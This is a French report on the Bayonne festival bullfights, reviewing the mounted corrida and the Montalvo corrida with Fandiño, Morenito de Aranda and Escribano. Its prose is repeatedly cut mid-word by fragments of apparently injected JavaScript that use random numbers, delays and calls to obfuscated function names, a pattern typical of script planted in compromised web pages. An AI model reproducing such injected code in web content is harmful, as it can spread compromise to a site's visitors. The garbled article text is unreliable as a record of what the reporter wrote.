BAYONNE: LE RETOUR DES CORRIDAS DES FETES

Il y a toujours eu celle à cheval, avec un succès jamais démenti. Une très belle entrée avec un public festif venu applaudir Pablo Hermoso et qui a été séduit par la belle Léa Vicens. Le Navarrais a très bien torée le toro d’ouverture mais curieusement le public ne lui a pas demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andé de trophée, après avoir échoué une première fois avec le réjon de mort. Il en aura deux à son suivant lors d’une prestation de haute volée, d’un temple magistral, aimantant le toro dès sa sortie et jusqu’à la mise à mort. Léa Vicens n’a pas eu cette continuité, mais par moments elle a éte remarquable de toreria. Un autre de ses atouts c’est sa capacité de communiquer avec le public, de lui faire partager sa lidia. Quant au jeune Manuel Moreno, on a vu aussi chez lui des étincelles qui laissent présager d’un bel avenir.

Le doute c’était pour la corrida des fêtes : le public allait-il répondre présent au retour de cette date dans le calendrier taurin ? Il est venu et a rempli près de deux tiers d’arènes. Moins festif que des années en arrière mais plus sérieux et attentif. La corrida de Montalvo était très haute sur pattes, excessivement, et n’a pas été aussi brave que la saison dernière. Il y eut quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and même un bon toro, le troisième, avec lequel Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño signa une faena très pausée, avec parfois du sentimiento, où il aurait coupé deux oreilles s’il n’avait pas été aussi malchanceux à l’épée. Il en aura une, de moindre poids, au dernier de la course.

Morenito de Arandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda a fait une très belle impression, même si ses toros chargèrent peu ou pas, il fit preuve de bon goût et d’un courage énorme. On le récompensa d’une oreille qui, souhaitons-le, pourrait lui ouvrir des portes dans le sud ouest.

Manuel Escribano toréa avec beaucoup de temple et il aurait dû couper une oreille après une faena bien construite à son premier mais le toro mit du temps à tomber après la mise à mort et une partie du public, sans aucune raison, le lui récrimina. Il alla chercher son toro suivant aux torils à porta gayola, bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilla de façon spectaculaire, et après une bonne entame à genoux, le toro s’éteint beaucoup trop vite. Escribano aurait mérité partir des arènes avec une récompense.

 

Les commentaires sont fermés.